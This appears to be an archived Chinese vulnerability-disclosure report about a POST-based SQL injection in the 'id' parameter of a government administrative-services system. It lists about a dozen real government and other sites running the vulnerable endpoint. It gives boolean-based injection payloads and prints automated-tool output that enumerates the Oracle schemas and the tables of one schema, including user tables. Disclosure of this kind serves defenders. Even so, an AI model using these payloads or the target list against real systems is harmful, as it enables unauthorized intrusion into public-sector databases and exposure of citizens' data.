某gov行政服务系统Oracle数据库搜索型POST注入

### 简要描述： RT ### 详细说明： 排除该套系统其它注入点： [WooYun: 某大型政府服务系统Oracle注入(使用量大)](http://www.wooyun.org/bugs/wooyun-2014-085183) [WooYun: 某Gov行政中心系统Oracle注入漏洞(使用量大)](http://www.wooyun.org/bugs/wooyun-2014-086650) 此处是一个POST注入，存在注入地方：spjggsQuery.do?method=busiinfoquery POST参数id存在注入 [<img src="https://images.seebug.org/upload/201503/10173608deee9075d2b7c3cdfe182a0376e06a8e.png" alt="0310_12.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/10173608deee9075d2b7c3cdfe182a0376e06a8e.png) wooyun还没人提交，抢先。。如图： [<img src="https://images.seebug.org/upload/201503/101737010dcbef8168afb80e60e5a06512028130.png" alt="0310_11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/101737010dcbef8168afb80e60e5a06512028130.png) 按照通用程序标准（十个以上案例+演示），部分案例如下： http://119.1.108.246/spjggsQuery.do?method=busiinfoquery http://jc.dlxg.gov.cn/spjggsQuery.do?method=busiinfoquery http://202.97.172.24/spjggsQuery.do?method=busiinfoquery http://www.tlsp.net/spjggsQuery.do?method=busiinfoquery http://hxasc.cn/spjggsQuery.do?method=busiinfoquery http://jc.dlxg.gov.cn/spjggsQuery.do?method=busiinfoquery http://jjjc.sqxz.gov.cn/spjggsQuery.do?method=busiinfoquery http://www.yjxzfw.com.cn/spjggsQuery.do?method=busiinfoquery http://www15886.edu6.org/spjggsQuery.do?method=busiinfoquery http://www.pjdzjc.gov.cn/spjggsQuery.do?method=busiinfoquery http://58.42.229.238/spjggsQuery.do?method=busiinfoquery http://61.189.156.73/spjggsQuery.do?method=busiinfoquery ... 暂时就先统计这么多。。。 演示见漏洞证明 ### 漏洞证明： 拿一个案例进行演示： http://119.1.108.246/spjggsQuery.do?method=busiinfoquery POST数据： ``` id=61161&permname=&dwmc= ``` 访问正常，如图： [<img src="https://images.seebug.org/upload/201503/101746173e3f18da23f030bbb9baf06196f303ff.png" alt="0310_14.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/101746173e3f18da23f030bbb9baf06196f303ff.png) POST数据（条件为真）： ``` id=61161' and 'a'<>'a&permname=&dwmc= ``` 访问正常： [<img src="https://images.seebug.org/upload/201503/1017442330a4d6528a9ea5f624b1b5bbde2aa8b0.png" alt="0310_12.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1017442330a4d6528a9ea5f624b1b5bbde2aa8b0.png) POST数据（条件为假）： ``` id=61161' and 'a'='a&permname=&dwmc= ``` 无数据： [<img src="https://images.seebug.org/upload/201503/10174537e12855365065872df8f99fa4f073f596.png" alt="0310_13.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/10174537e12855365065872df8f99fa4f073f596.png) 直接上工具： [<img src="https://images.seebug.org/upload/201503/10174658c4afc0d7cad0f96dab33cc4176f08298.png" alt="0310_10.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/10174658c4afc0d7cad0f96dab33cc4176f08298.png) 数据库： [<img src="https://images.seebug.org/upload/201503/1017534338e1f9578ec7401205f4de70502a254b.png" alt="0310_15.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1017534338e1f9578ec7401205f4de70502a254b.png) [<img src="https://images.seebug.org/upload/201503/10180002f19a2feb1bfe2094ee88ce22fe170c85.png" alt="0310_16.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/10180002f19a2feb1bfe2094ee88ce22fe170c85.png) ``` available databases [27]: [*] CTXSYS [*] DATASWAP [*] DBSNMP [*] DMSYS [*] EXFSYS [*] HR [*] IX [*] JEECMS [*] MDSYS [*] OE [*] OLAPSYS [*] ORDSYS [*] OUTLN [*] PM [*] QXN_TYSP [*] QXN_WEBHALL [*] SCOTT [*] SH [*] SYS [*] SYSMAN [*] SYSTEM [*] TSMSYS [*] TYSP [*] TYSP_SYSTEM [*] WEBHALL [*] WMSYS [*] XDB ``` 表信息： ``` Database: WEBHALL [18 tables] +--------------------------+ | T_DJL | | T_WEBHALL_BGXZ | | T_WEBHALL_CJWD | | T_WEBHALL_FLFG | | T_WEBHALL_FLYJ | | T_WEBHALL_FRIEND_CONN | | T_WEBHALL_MENU | | T_WEBHALL_MENU_USERGROUP | | T_WEBHALL_NEWS | | T_WEBHALL_NEWS_CONTENT | | T_WEBHALL_RESEARCH | | T_WEBHALL_SPMANAGER | | T_WEBHALL_TSPL | | T_WEBHALL_USER | | T_WEBHALL_USERGROUP | | T_WEBHALL_USER_USERGROUP | | T_WEBHALL_ZRXX | | T_WEBHALL_ZRXX_REVERT | +--------------------------+ ``` 数据不跑了。。。